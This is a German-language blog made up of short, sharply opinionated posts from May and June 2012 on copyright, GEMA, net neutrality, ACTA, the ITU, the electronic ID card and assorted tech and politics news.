[l] Die GEMA hat sich von den Musikpiraten trollen lassen und Klage eingereicht. Es geht um ein Creative Commons Stück, das unter Pseudonym veröffentlicht wurde. Die GEMA findet jetzt, wegen des Pseudonyms könne sie nicht ausschließen, dass das Werk nicht doch auch unter ihren Universalanspruch fällt (der ENDLICH WEG MUSS, UND ZWAR RESTLOS), und will daher jetzt Geld von den Piraten sehen. Möge der Richter die GEMA in der Luft zerreißen.

Sun Jun 24 2012

[l] Das Ausmaß des Weggetretenseins der Gema ist erschütternd. Klar ruinieren wir die Diskobranche, aber hey, dafür gibt es doch ein Schiedsgericht, und wenn das in zwei Jahren gegen uns entscheidet, dann kriegen die daran pleitegegangenen Clubs doch ihr Geld zurück!1!!

Fri Jun 22 2012

[l] Fehlerhafte Gesundheitskarten an 55 Kassen ausgeliefert. Fehlerhaft nicht im Sinne von "der Lack geht leicht ab" sondern:
Theoretisch sei es Datendieben möglich, Kartendaten auszulesen und die PIN entsprechend zu ändern.
Äh, WTF?! Aber der Dienstleister hat sich schlau gemacht, und von der Energiemafia lernen heißt siegen lernen:
Eine akute Gefahr bestehe allerdings nicht.
Oh aber natürlich nicht! Was kann da schon passieren!1!! (Danke, Oliver)

Thu Jun 21 2012

[l] Was passiert, wenn Shell zu einer Privat-Party in der Space Needle in Seattle einen Miniatur-Ölförderturm als Getränkespender aufbaut? Er hat einen Blowout :-)
Update: Ich hab da auch keine näheren Informationen zu, mir hat halt jemand den Link gemailt. Kann ne Fälschung sein. Aber wenn es eine ist, ist es eine schöne.
Update: War ein Fake.

Wed Jun 20 2012

[l] Sechs Prozent der Bundesbürger ab 14 Jahren sind schon mal abgemahnt worden. Das hat eine Umfrage des Bundesverbands der Verbraucherzentralen ergeben. Wenn man übliche Anwaltsgebühren (Achtung: Google Plus) zusammenrechnet, haben die Abmahnanwälte mehr verdient als die Musikindustrie. Und wisst ihr, was die Leute mit dem Geld sicher nicht machen, das sie an Abmahnungen verlieren? Musik kaufen!

Thu Jun 14 2012

[l] Obama-Verhandlungspapier für eine pazifische Freihandelszone geleakt. Naja, was kann da schon schlimmes drinstehen, werdet ihr euch jetzt vielleicht fragen. Das hier:
The new texts reveal that TPP negotiators are considering a dispute resolution process that would grant transnational corporations special authority to challenge countries’ laws, regulations and court decisions in international tribunals that circumvent domestic judicial systems.
Äh, wie bitte?!? Firmen sollen Gesetze über internationale Tribunale kippen können, ohne den inländischen Gesetzgebungsprozess auch nur befragen zu müssen dazu!?!?
Hat dieser Obama noch nicht genug kaputtgemacht? So langsam sieht das fast so aus, als sei Bush der weniger schlimme Präsident gewesen.
[l] Lobbyrepublik Deutschland: Der Referentenentwurf für das "Leistungsschutzrecht" ist da. Es drängt sich der Eindruck auf, als würden die diesen Blödsinn wirklich durchziehen, und wir müssen mehr machen als drüber lachen und davon ausgehen, dass es aus offensichtlichen Gründen nicht umgesetzt werden wird. Ich finde §87g (3) besonders amüsant:
Das Recht des Pressverlegers kann nicht zum Nachteil des Urhebers oder eines Leistungsschutzberechtigten geltend gemacht werden, dessen Werk oder nach diesem Gesetz geschützter Schutzgegenstand im Presseerzeugnis enthalten ist.
Das ist doch per Definition so! Ich als Urheber habe immer einen Vorteil davon, wenn mein Werk verteilt und rezipiert wird, wenn auch nicht unbedingt einen monetären. Wenn der Verleger dann kommt und das wegklagt, dann habe ich als Urheber also immer einen Nachteil. Wer macht eigentlich diese Referentenentwürfe? Können die da nicht mal jemanden nehmen, der das Wort "Logik" kennt?
Update: OH:
Das is so ein hanebüchener Unsinn, was da steht, schon in der Definition. Da is die Herdprämie intellektuell herausragend dagegen.
Und eine andere Äußerung war auch schön:
ja, ein klarer Fall von "lassen wir mal die Gerichte das verklaren…"
Update: Um der Vernebelungstaktik mal ein bisschen Wind entgegenzusetzen: die Verlage wollen gerne wie Orchester behandelt werden. Die möchten gerne, dass ihre Ausführung der Werke anderer als eigenständiges Kunstwerk anerkannt wird. Orchester nehmen ein Werk von jemand anderem und machen daraus etwas eigenständiges, eine Interpretation, Kunst eben. Verlage nehmen auch Werke von Anderen, aber darin erschöpft sich die Analogie auch schon. Das einzig kunstvolle an Verlagen sind die immer ziselierteren Gängelklauseln in deren Knebelverträgen. Wenn es jemanden gibt, der keinen Schutz für sein Werk verdient hat, dann sind es die Verlage.

Tue Jun 12 2012

[l] Dammbruch bei Kabel Deutschland: Neue AGBs mit Bandbreitendrosselung bei Filesharern. Konkret kriegen Kunden nur noch 100 KBit/sec durch ihre Leitung, wenn sie pro Tag mehr als 10 GB Traffic verursachen.
Das ist der erste große Breitband-Internet-Anbieter, der so offen die Netzneutralität verletzt. Insofern ist der Beißreflex jetzt natürlich, da voll gegenzukloppen. Ich bin da Kunde und daher "Betroffener".
Leider ist die Sache nicht so einfach, wer da jetzt der Gute ist. Ich will mal ein paar Details auflisten. Erstens drosselt KDG schon immer. Ich habe auf dem Papier 32 MBit Downstream. Tagsüber habe ich um die 2 MB/sec Downloadrate, nachts um die 4 MB/sec. Ich finde auch 2 MB/sec in Ordnung, bei der Telekom hab ich in Stoßzeiten noch deutlich weniger als die Hälfte der Bandbreite gesehen.
Zweitens ruckelt Youtube bei KDG nicht. Das war für mich eine völlig neue Erfahrung. Da war bei der Telekom nicht dran zu denken. Das ging gar nicht. Wenn das Shaping der Preis dafür ist, dass Dienste wie Youtube nicht ruckeln, bin ich das zu zahlen bereit.
Ich habe mich vorhin mit ein paar Kumpels darüber unterhalten. Da kamen dann ein paar Argumente, die ich spannend finde. Erstens: Das ist ein Shared Medium, da muss man shapen. Zweitens: sollen sie doch shapen, aber dann sollen sie auch ungeshaped Internet anbieten.
Ich finde beide Argumente falsch. Erstens weil alle Internetzugangstechnologien ein Shared Medium sind. Auch DSL wird massiv überbucht. Mir als Kunde ist das wurscht, ob die Daten nicht bei mir ankommen, weil das letzte oder das vorletzte Stück Leitung überlastet ist. Das Argument "aber das ist ein shared medium" kann ich nicht gelten lassen.
Das Argument "aber dann sollen sie bitte auch ungeshaped anbieten" klingt sinnvoll. Aber mal auf den Tisch mit den Fakten. Wenn man in großen Kontingenten Traffic einkauft, kommt man für 100 MBit nicht auf 30 Euro pro Monat, eher so 150, mit Kosten für die Infrastruktur und Wartung des Providers sagen wir mal 200. Gut, sagt jetzt vielleicht der eine oder andere, das wäre ich zu zahlen bereit. Aber wäre nicht das erst die eigentliche Netzneutralitätsverletzung? Der Grund, warum wir Netzneutralität haben wollen, ist doch gerade weil wir so ein zweigleisiges Modell vermeiden wollen, bei dem die Reichen gutes Internet haben und beim Rest ruckelt Youtube. Insofern finde ich das akzeptabler, wenn es kein Premium-Angebot ohne Ruckeln gibt, denn auf der feinen Linie zwischen Qualitätsmaximierung und Profitmaximierung nimmt das Premiumangebot allen Zweifel, dass es um Letzteres geht.
Ich finde die Netzneutralitätsdebatte im Übrigen generell ziemlich verlogen. Erstens ist Traffic Shaping gut und wird von fast allen gemacht, ob sie es wissen oder nicht. Eure Plasterouter priorisieren wahrscheinlich Voip vor Downloads, wenn sie nicht noch aus dem letzten Jahrtausend sind. Und das will man ja auch so haben, weil Internet anders völlig unerträglich ist. Und dieses "aber aber dann müssen die ja DPI machen und DPI ist böse!1!!" ist auch verlogen, denn man kann das natürlich auch ohne DPI machen, indem man ein paar gute Ports whitelistet und den Rest shaped. Dann funktioniert es aber weniger gut und das ist am Ende im Sinne von niemandem, weder dem Kunden noch dem Provider. Wir als Kunden wollen, dass das Internet nicht ruckelt, und der Weg dahin heißt Traffic Shaping und QOS. Das kann man nicht einfach verbieten und gut ist.
Die einzige andere Möglichkeit ist, wenn man den Providern gesetzlich vorschreibt, dass sie die Bandbreite nicht überverkaufen dürfen. Könnte man drüber reden, aber überlegt euch mal, wie die Welt dann aussieht. Dann haben wir wieder 1 MBit Internetanbindungen. Und um Anfeindungen wegen Netzneutralitätsverletzung aus dem Wege zu gehen würden die Provider dann immer noch shapen, aber halt in die andere Richtung — keiner darf dann mehr gutes Internet kriegen, wenn Kapazitäten frei sind, sondern dann muss das auch für den einzigen aktiven Teilnehmer schmerzen und ruckeln.
Fakt ist: 32 MBit Internet zuhause ist nicht real. Das geht nur, wenn man mehr Bandbreite verkauft als man hat. Und das ist ja nicht nur bei Internet üblich, sondern auch bei Flugzeugen und der Bahn. Und wenn dann mehr Leute zugfahren als Sitzplätze da sind, dann müssen die eben stehen, und beim Flugzeug können die dann halt nicht mitfliegen und die Fluglinie hat ein Problem und muss Gutscheine verteilen. Auch unsere Straßen und das Telefonnetz sind nicht darauf ausgelegt, dass sie alle zur gleichen Zeit benutzen. Denen verbietet das ja auch keiner. Von Banken mal ganz zu schweigen, die verleihen ja auch mehr Geld als sie Einlagen haben.
Ich glaube daher, Netzneutralität ist die falsche Baustelle. Das wirkliche Problem ist, wenn Provider ihre Netze nicht ausbauen. Da kann man aus meiner Sicht Kabel Deutschland gerade vergleichsweise wenig Vorwürfe machen. Mein Vorschlag wäre daher, nicht die Netzneutralität festzuschreiben, sondern andersherum:
1. Hinnehmen, dass Traffic Shaping Realität ist. So funktioniert unsere Infrastruktur. Da führt kein Weg dran vorbei.
2. Verbieten, dass Provider im Durchschnitt über die tatsächlich angefragten Ressourcen deutlich weniger Traffic liefern als als Maximaltraffic beworben wurde. Oversubscribing ist OK, solange der Kunde es nicht merkt. Man muss die Provider halt zwingen, bei Überfüllung zügig das Netz auszubauen. Ich habe im Moment keinen Grund für Beschwerde bei Kabel Deutschland an der Front.
3. Verbieten, dass Provider eine Zwei-Klassen-Internet einführen, wo wer mehr zahlt weniger Shaping pro Nominalbandbreite kriegt.
Ich persönlich finde auch das Shaping tagsüber auf die Hälfte im Grunde auch akzeptabel. Das ist der Preis, den ich dafür zahle, dass ich für 30 Euro dickes Internet kriege. Aber man kann auch das Gegenteil argumentieren: Sollen sie lieber mehr Bandbreite ranschaffen und die Kosten auf die Kunden umlegen. Wem das zu teuer ist, der kann ja zum alten Preis das halbe Internet nehmen. Was wir eigentlich erreichen wollen ist ja, dass die Leute sich grob auf die Bandbreitenangaben ihres Providers verlassen können.
Update: Das sollte jetzt kein Manifest zur Netzneutralität werden, sondern nur ein paar Details zum Shaping ansprechen. Die eigentliche Netzneutralitätsverletzung kommt, wenn Rapidshare zu KDG geht und fragt, wieviel Geld sie auf den Tisch legen müssen, damit sie höher als Mediafire priorisiert werden, und KDG dann eine Zahl sagt. Auf der anderen Seite würde niemand was sagen, wenn Rapidshare bei KDG im Rechenzentrum Platz anmietet und dort ihre Server hinstellt. So einfach ist die Situation eben nicht, dass man das mal eben übers Knie brechen kann.
Dann kommt hier noch der Einwand, dass Netzneutralität nicht um Shaping nach Trafficsünderei geht sondern um Diskriminierung von Diensten. Wer Lesen kann ist klar im Vorteil:
Die neue Regelung soll neben Peer-to-Peer Netzwerken unter anderem auch One Click Hoster betreffen.
[l] Wollt ihr mal was wirklich schlimmes lesen? Ja? Genau der richtige Tag für das Beobachten von Auffahrunfällen? Dann hab ich was für euch! Das "Diskussionspapier" der CDU zum Urheberrecht. Mit Highlights wie
1. Rechtsvereinfachung
Wie immer geht es bei der Union mit einer Lüge los. Das mit der Vereinfachung behaupten sie immer und machen es dann nur noch schlimmer. Man schaue sich nur das Steuerrecht an. Wer hat das Urheberrecht denn so schlimm gemacht, lieber CDU? IHR!
Die CDU/CSU-Bundestagsfraktion ist auch Anwalt der Verbraucher.
Bwahahaha, ein echter Schenkelklopfer!
Oh und sie wollen die Hostingprovider in die Pflicht nehmen, die Kunden zu "informieren". Denn dass die Leute alle kopieren, das hängt damit zusammen, dass sie so schlecht informiert sind, müsst ihr wissen. Nicht weil die Menschheit schon immer kopiert und öffentlich aufgeführt hat und das in unserem Blut ist.
Was sagt die CDU zum Thema Privatkopie von kopiergeschützten Produkten?
Entscheidend ist eine vollständige Information des Verbrauchers über die Möglichkeiten und Grenzen des Kopierens vor dem Erwerb des Originals. Er kann dann selbst entscheiden, ob er ein kopiergeschütztes Produkt überhaupt erwerben will.
Aha. Soso. Denn wie wir alle wissen hat man bei Computerspielen im Allgemeinen die Wahl zwischen einer Version mit Kopierschutz und einer ohne. Wer Kopierschutz nicht will, kauft halt keine Spiele mit Kopierschutz!1!! … widewidewie sie mir gefällt!
Die CDU/CSU-Bundestagsfraktion tritt für die Vertragsfreiheit im Urheberrecht ein
Ihr seid ja alle selber Schuld, wenn ihr euch von der Contentmafia mit Knebelverträgen gängeln lasst!1!!
Die CDU/CSU-Bundestagsfraktion lehnt pauschale Vergütungsmodelle für die Erstnutzung von urheberrechtlich geschützten Inhalten ab.
Und zwar nicht weil das bestehende System funktioniert oder die CDU ein besseres System hat. Nein. Weil das in die Kreativwirtschaft (BWAHAHA!) eingreifen würde. Man will die Contentmafia nicht beim geordneten Herunterfahren ihrer Industrie stören.
Die Wissenschaft trägt maßgeblich zur Erweiterung unseres Wissens bei
No Shit, Sherlock!
Die CDU/CSU-Bundestagsfraktion lehnt auch weiterhin jede Ausweitung der Patentierungspraxis im Softwarebereich ab.
Ach, ist das so, ja?
Auch die Presseverleger müssen im Internet ihre verlegerische Leistung mit einem Leistungsschutzrecht geltend machen können.
Nein, wieso? Wäre das nicht ein Eingriff in die Geschäftsmodelle des Marktes, was weiter oben noch fundamentalistisch als Argument gegen eine Kulturflatrate benutzt wurde?
Naja und ansonsten das Übliche. Abgaben auf USB-Sticks, Vorratsdatenspeicherung (ja, wirklich!!), "Warnhinweise", "Selbstregulierung", blafasel. Oh und gegen Ende noch ein echter Höhepunkt:
Die CDU/CSU-Bundestagsfraktion will die Verbraucher vor unberechtigten Abmahnungen wegen Urheberrechtsverstößen schützen.
Das Problem ist doch, dass viele dieser Abmahnungen dank CDU-Gesetzen nicht unberechtigt sind. Deshalb müssen die Gesetze ja auch geändert werden. Und deshalb muss diese CDU endlich weg.

Wed Jun 6 2012

[l] Wisst ihr noch neulich, als die Tatort-Autoren sich für das Urheberrecht stark gemacht haben? Ja? Gut.
In dem Kontext ist die folgende Meldung gleich noch viel aromatischer: Tatort klaut Alarmanlagen-Schaltplan aus dem Internet. Weiter unten in dem Thread taucht dann auch der Autor des Schaltplans auf, den natürlich niemand um Erlaubnis gefragt hatte. (Danke, Simon)
[l] Der WWF versucht juristisch den Verkauf des "Schwarzbuchs WWF" zu stoppen. Gegen das Buch selbst haben sie offenbar bislang noch keine einstweilige Verfügung erwirkt gekriegt (was mich persönlich sehr verwundert, ob das LG Hamburg da einen schlechten Tag hatte? Die sind doch sonst nicht zimperlich!), daher gehen sie jetzt der Reihe nach gegen Verkäufer vor, haben schon Unterlassungsansprüche gegen Amazon und Libri geltend gemacht. Der Autor betreibt auch selbst eine Homepage, auf der er zu den Vorwürfen des WWF Stellung nimmt. Der WWF hat auch eine Webseite dazu.

Thu May 31 2012

[l] ACTA stirbt weiter vor sich hin. Die Niederlande haben nicht nur ACTA abgelehnt, sondern haben auch gleich ein Gesetz gemacht, dass die Regierung in Zukunft keinem ähnlichen Vertrag zustimmen darf. Das ist natürlich nur solange was wert, bis sich die Mehrheitsverhältnisse wieder ändern, aber es ist ein schönes Zeichen.
Und die drei wichtigsten Ausschüsse im EU-Parlament haben sich gegen ACTA ausgesprochen. Es handelt sich um ITRE (Industrie, Forschung, Energie), JURI (Rechtsausschuss) und LIBE (Freiheits- und Menschenrechte). Wenn Wirtschaft und die Juristen sich einig sind, würde ich mal fast ansagen, dass die Sache damit vom Tisch ist.

Tue May 29 2012

[l] Viele Leser scheinen die Hintergrundgeschichte zur ITU und der Internetzensur gar nicht zu kennen. Die ITU ist der neue Name für die CCITT, eine supranationale UNO-Behörde, die Standards für die Telekommunikationswelt definiert. Die ITU ist ein frühes Beispiel dafür, dass "public-private Partnerships" nicht funktionieren. Im Wesentlichen sitzen da die Groß-Telcos drin und definieren sich in Kommittees ihre Standards möglichst komplex so zusammen, dass man selber eine Riesen-Telco sein muss, um eine Chance zu haben, das umsetzen zu können. Auch vom Prozedere ist der Laden im Wesentlichen nur für aktuelle und ehemalige Staatskonzerne zugänglich, die kleinere Konkurrenz kommt nicht rein. Oh und außerdem kosteten ITU-Spezifikationen traditionell Geld, Open Source muss also auch draußen bleiben.
Um sich die Kartellbehörden vom Hals zu halten, spricht die ITU-Nomenklatur von "Recommendations", Empfehlungen, nicht von Standards. Die ITU hat einen Haufen bekannter Standards unter ihrer Ägide, u.a. ASN.1, JPEG, MPEG, Fax, VoIP, X.509 … praktisch alle Standards, die die Form [Großbuchstabe].[Ziffernfolge] haben, sind ITU-Standards. Beispiel: H.264. Es ist fair zu sagen, dass es sich um ein Kartell großer Firmen handelt, mit dem Ziel, jeweils möglichst viele ihrer Patente in internationale Standards so zu integrieren, dass die Konkurrenz am Mitmachen gehindert wird.
Bis in die 90er Jahre war alles schön für die ITU, die damals noch CCITT hieß. Aber dann kam dieses fiese Internet. Das Internet war die Antithese zur ITU. Die ITU hatte so Dinge wie X.25 im Angebot (gab es damals von der Telekom unter dem Namen "Datex-P"), und das Open Systems Interconnect (OSI), eine furchtbare Totgeburt, die keine Chance gegen TCP/IP hatte.
So und jetzt denkt euch mal in die herein. Euer Monopolaufrechterhaltungssystem ITU droht plötzlich von ein paar langhaarigen Hippies kaputtgemacht zu werden. Die veröffentlichen nicht nur Standards, die genau so gut funktionieren wie eure, und sogar besser skalieren, deren Standards sind für jedermann frei runterladbar! Man kann sogar selber welche einreichen. Einfach so!
Erst passierte, was immer passiert, die Emporkömmlinge wurden belächelt. Die haben NIE eine Chance. Haha, guck mal, TCP, wie süß!
Je mehr sich aber abzeichnete, dass das Internet gewinnen würde, desto verzweifelter hat die ITU sich anzupassen versucht. Sie haben ihre Standards auch zum freien Download ins Netz gestellt (naja, frei … sagen wir kostenlos. Man muss da Formulare ausfüllen und so; Behörde halt). Sie haben neue Geschäftsfelder frühzeitig zu besetzen versucht (VoIP). Aber es hat alles nichts geholfen. Die Kontrolle entglitt der ITU im Internet. Die aktuelle Strategie ist daher, nach Schwachstellen im Internet zu suchen, und die gezielt anzugreifen. Die offensichtlichste Schwachstelle ist die Kontrolle, die die US-Regierung auf das DNS ausübt. Die ITU betreibt verstärkt Lobbyismus, um das Internet der ITU unterstellt zu kriegen. Leider haben sie nicht kapiert, dass das für die Amis keine Option ist, die Kontrolle über das DNS aus der Hand zu geben. Daraus ist daher nichts geworden, trotz jahrelanger Lobbyanstrengungen der ITU.
Und jetzt probieren sie halt den Cyberwar-Bullshit und faseln was von kritischer Infrastruktur und das gehört in die Hände von Profis (der ITU).
Hoffentlich scheitern sie damit auch weiterhin auf ganzer Linie.
Update: Auch netzpolitik.org hat was über die ITU.

Mon May 28 2012

[l] Der hat nicht ALLES falsch gemacht, der Obama. Diese Richterin hier, die er ernannt hat, war die richtige Wahl.
A federal district judge today, the newly-appointed Katherine Forrest of the Southern District of New York, issued an amazing ruling: one which preliminarily enjoins enforcement of the highly controversial indefinite provisions of the National Defense Authorization Act, enacted by Congress and signed into law by President Obama last December.
Die Klage kommt u.a. von Daniel Ellsberg, Noam Chomsky und Birgitta Jonsdottir. Sehr schöner Sieg! Insbesondere zumal die Richterin da alle möglichen Argumente weggewischt hat, die die Regierung gebracht hat, u.a. dass keiner der Kläger bisher verhaftet wurde oder auch nur konkret mit Verhaftung bedroht wurde.
[l] Habt ihr das mit der IMF-Chefin Lagarde mitgekriegt, die den Griechen hilfreiche Tips zum Sparen gegeben hat? Hilfreiche Tips wie "zahlt doch einfach alle eure Steuern"? Was hat die eigentlich vorher so gemacht? Nun, als sie Finanzministerin von Frankreich war, hat sie deren Verschuldung kleingeschummelt:
In fact in the case of France much of the local debt was inherited from the central Government, which “delegated” the debt to localities where national funds were spent, effectively reducing the national debt headline figure. French finance Minister during this process was Christine Lagarde, now head of the IMF.
Das ist natürlich auch eine tolle Methode, um die Stabilitätskriterien der Eurozone "einzuhalten"…

Fri May 25 2012

[l] Mir mailt gerade jemand einen Screenshot zu, in dem sich Avira selber in Quarantäne schieben will. Also diese Antiviren, sage ich euch, da weiß man, was man hat!1!!
Update: siehe auch.
Update: An den einen, der mir mailte, dass das gephotoshoppt ist, und den anderen, der mir mailte, die Fehlermeldung passt nicht: gut gemacht. An die anderen: durchgefallen. Der Teil, dass mir den "Screenshot" jemand gemailt hat, stimmt allerdings wirklich :-)
[l] Hier kommt gerade eine Anfrage einer Journalistin zum Perso rein. Ich habe mich über die Anfrage geärgert, aber dann doch geantwortet.
Es ging um den Personalausweis, und die Fragen zielten darauf ab, dass den ja keiner verwendet, weil der zu unsicher sei, und wie man den sicherer machen könnte. Die Frage ist an sich schon falsch gestellt. Aber seht selbst.
Hier sind die paraphrasierten Fragen und Antworten.
[Der erste Teil beantwortete keine Frage sondern richtet sich an die Einleitung, in der es heißt, ich als Blogger und CCC-Mitglied hätte die hohen Sicherheitsrisiken bemängelt]
Kein Mensch interessiert sich für die Sicherheitsrisiken.
Im Gegenteil, gerade WEIL die Leute annehmen, dass die das mit der Sicherheit schon hinkriegen könnten, will das keiner haben. Der Staat hat wieder und wieder gezeigt, dass er jede denkbare Datenbank über uns führen will. Unsere Telefonate will er überwachen, unsere Emails mitlesen, unsere Nummernschilder scannen, unsere Bankdaten mitschneiden, die Datensammelwut der Behörden ist unersättlich. Bei Facebook und co sieht das ähnlich aus. Im Moment könnte man im Zweifelsfall noch sagen: Das war ich nicht, ich wurde gehackt, ein Virus hat meinen Rechner befallen, das war ein Datenbankfehler, das muss ein Algorithmus danebengegriffen haben. Diese Restunsicherheit erlaubt es Menschen, im Internet auch mal verwerfliche Dinge zu tun, Pornographie anzugucken, anonym zu lästern; kurz: Zu leben.
Niemand will sich daher im Internet mit seinem Personalausweis anmelden. Soweit kommt es noch, dass meine Surfgewohnheiten und Online-Einkäufe in irgendwelchen staatlichen Datenbanken landen, und ich die Authentizität auch noch mit meinem Personalausweis bestätigt habe! Und dann bewirbt man sich Jahre später bei er Polizei und wird nicht genommen, weil man sich vor Jahren mal mit dem Personalausweis bei Indymedia angemeldet hat.
Im Moment, wenn Sie sich wo online anmelden, und Ihren Namen eingeben, dann entsteht auf der anderen Seite ein Datensatz. Der ist je nach Füllstand Geld wert. Je zuverlässiger die Daten sind, desto mehr Geld ist der wert. Der Datensatz verdoppelt sich im Wert, wenn Sie den auch noch mit Ihrem Personalausweis bestätigt haben. Wieso würde irgendjemand dann nicht von Ihnen fordern, dass Sie sich mit dem Personalausweis anmelden? Das wäre wie Geld Verschenken! Und damit ist auch klar, dass Ihr gesamtes Surfverhalten nicht nur aufgezeichnet wird (das wird es auch jetzt schon), sondern dass da dann nicht nur dransteht, welcher Haushalt das war, sondern Ihr Name.
[Hat sich in den knapp zwei Jahren seit Einführung etwas getan, ist der Perso jetzt sicherer als vorher?]
Der Ausweis wird auf der einen Seite immer unsicher bleiben, und auf der anderen Seite ist er jetzt schon viel zu sicher. Bisher kann ein Hacker, der auf einem PC einbricht, die Kreditkartendaten stehlen. Das passiert auch alle Nase lang. Das Opfer zeigt den Diebstahl dann an und lässt die Abbuchungen rückgängig machen. Versuchen Sie das mal, wenn ein Hacker in Ihrem Namen mit Ihrem Personalausweis im Internet einen Vertrag unterschreibt!
Daher benutzt so gut wie niemand den Personalausweis online. Und das ist auch gut so.
[Wie könnten solche Verbesserungen aussehen?]
Gar nicht. Die Idee, dass man einen sicheren Ausweis im Internet haben will, ist an sich schon falsch.
[Wie kann man die Online-Funktion sicherer machen und kann sie überhaupt absolut sicher gemacht werden?]
Man kann immer noch mehr Gängeleien einbauen. Fingerabdrücke messen, Stimmmuster erkennen, mit der Kamera den Gang filmen und einen 3d-Kopfabdruck machen. Der Erfolg von allen solchen Maßnahmen ist nur, dass ich als Bürger noch mehr meiner Daten in staatliche Datenbanken wandern sehe, über die ich keinerlei Kontrolle habe. Sicherer wird dadurch gar nichts. Sicher ist lediglich, dass meine Daten irgendwann wegkommen werden.
[Was passiert, wenn eine Identität "gestohlen" wird?]
Das selbe wie im Moment. Nur dass Ihnen dann keiner mehr glauben wird, dass Sie das nicht selber waren. Weil alle technischen Maßnahmen immer nur zu einer Beweislastumkehr zu Lasten der Opfer führen.
[Hinterlässt des Spuren die zurückverfolgt werden können?]
Man kann immer Dinge zurückverfolgen, aber die Spuren könnten genau so von Ihnen gelegt worden sein. Je mehr "Sicherheit" wir uns vom Staat vorschreiben lassen, desto weniger glaubwürdig sind im Zweifelsfall dann solche digitalen Spuren, die uns entlastet hätten. Denn die sind im Gegensatz zu dem Personalausweis nicht digital signiert.
[Wie kann der Nutzer sehen, dass seine Daten gestohlen wurden?]
Fragen Sie sich doch mal selbst, wie viel Sie davon mitgekriegt haben, dass Ihre Bankdaten an die Amerikaner weitergegeben werden. Oder was Facebook alles an Daten über Sie gesammelt hat. Oder Google. Kriegen Sie mit, was die Schufa über Sie an Daten hat? Dort steht Ihnen sogar eine Auskunft zu. Haben Sie das mal gemacht?
So ist das mit Daten. Man kriegt das nicht mit. Der einzige Schutz ist, die Daten gar nicht erst anfallen zu lassen.
Deshalb benutzt auch instinktiv niemand den Personalausweis online. Und das ist auch gut so.

Thu May 24 2012

[l] Weil mir hier gerade vermehrt gemailt wird, die Geheimdienste könnten PGP entschlüsseln: nein, können sie nicht. Was sie tun können ist Passwörter durchprobieren. Die sind direkt gefragt worden, ob sie PGP entschlüsseln können, und die Antwort war "im Prinzip haben wir die nötige Software dafür". Die nötige Software kann man kaufen, die probiert Passwörter durch. Bessere Angriffe auf PGP sind nicht bekannt. Insofern haltet mal bitte alle die Füße still. Solange ihr eine ordentliche Passphrase verwendet und der Schlüssel schön lang ist und ihr nicht einen debianisierten Zufallszahlengenerator beim Keyauswürfeln hattet, seid ihr heute genau so sicher wie letzte Woche.
[l] Diese ganze Sandbox-Scheiße hat es so komplex gemacht, einen Buffer Overflow auszunutzen, dass man kaum noch Exploits in der Öffentlichkeit sieht. Die gehen nur noch hinter der Ladentheke in Richtung Geheimdienste über den Weg. Gelegentlich kommt dann aber doch mal jemand und zeigt einen Exploit, und das sieht dann so hier aus:
In the case of Pinkie Pie’s exploit, it took a chain of six different bugs in order to successfully break out of the Chrome sandbox.
Wer sich jetzt denkt, hey, 6 Bugs in Reihe exploiten, das ist bestimmt eher die Ausnahme:
In an upcoming post, we’ll explain the details of Sergey Glazunov’s exploit, which relied on roughly 10 distinct bugs.
OMGWTF :-)

Tue May 22 2012

[l] SAP-Manager in den USA verhaftet, weil er sich mit selbstgedruckten Barcodes große Rabatte auf Lego-Produkte erschwindelt hat. Die hat er dann angeblich auf Ebay zum Echtwert weiterverkauft und so Profit gemacht. Nicht viel Profit, wir reden hier von $1000. Also ich weiß ja nicht, was man bei SAP als Manager verdient, aber ich hätte gedacht, dass man da keine Barcodes mehr drucken muss, um sich $1000 zu erschwindeln. WTF!?

Mon May 21 2012

[l] Zu dem Facebook-Aktiending sei noch angemerkt, dass IPOs immer so gemacht werden, dass die herausgebende Bank (Morgan Stanley in diesem Fall) guckt, wieviel Nachfrage es gibt, und dann gezielt weniger Aktien verkauft, damit der Kurs erstmal nach oben geht und es wie ein Erfolg aussieht. Wenn diese Aktie also so direkt nach dem IPO nicht nach oben geht, dann hat entweder Morgan Stanley das verkackt oder die Prognosen waren völlig falsch. Da Morgan Stanley Stützkäufe machen musst, um das Schlimmste zu verhindern, tippe ich mal auf letzteres. Ich stelle mir da eine konzertierte Trollaktion vor, bei der Leute Interesse an der Aktie vorgetäuscht haben, um Morgan Stanley zu ärgern. Wird vermutlich eher mundanes Verkacken gewesen sein, aber ich nehme mir da mal künstlerische Freiheit :-)

Thu May 17 2012

[l] Wusstet ihr eigentlich, dass die US Air Force in den 50er Jahren den Mond nuken wollte? Sie haben damals Carl Sagan eingestellt (der später ein sehr beliebtes TV-Programm zum Weltraum gemacht hat, in den USA kennt den praktisch jeder). Die Überlegungen waren so weit gediehen, dass sie rumgerechnet haben, wie sie das so machen können, dass man die Explosion von der Erde aus sehen kann.
Warum würde man sowas tun wollen? Naja, äh, "because we can".
Money Quote:
Project A119 was never carried out, primarily because a moon landing would be a much more acceptable achievement in the eyes of the American public.
No shit, Sherlock! (Danke, Andreas)

Tue May 15 2012

[l] Krass, nachdem die griechischen Parteien keine Regierung bilden konnten, machen sie halt Neuwahlen. Was sind das denn für Waschlappen, die sollten sich mal die Belgier anschauen, wie lange die ohne Regierung weitergemacht haben! Und nicht zu ihrem Nachteil, wenn ich das mal betonen darf.
Update: Mir mailt gerade jemand, dass das eine Vorgabe der griechischen Verfassung ist. Auf der einen Seite kann man die dann nicht als Waschlappen beschimpfen, weil sie Neuwahlen machen. Auf der anderen Seite kann man sich jetzt als Waschlappen beschimpfen, weil sie es soweit haben kommen lassen. :-)

Thu May 10 2012

[l] Fnord des Tages: Die Polizei ermittelte im Dönermorde-Fall, indem sie selber eine Dönerbude aufgemacht haben. Ich für meinen Teil applaudiere, dass die Polizei da mit vollem Körpereinsatz ermittelt hat. Wenn die mal auch in Fällen von Polizeigewalt gegen Demonstranten mit so einem Nachdruck ermitteln würden, wäre dies ein noch schöneres Land. (Danke, Andreas)

Wed May 9 2012

[l] Wo ist eigentlich die Piraten-Initiative zur Gerätehoheit? Gibt es die? Wenn nein, warum nicht?
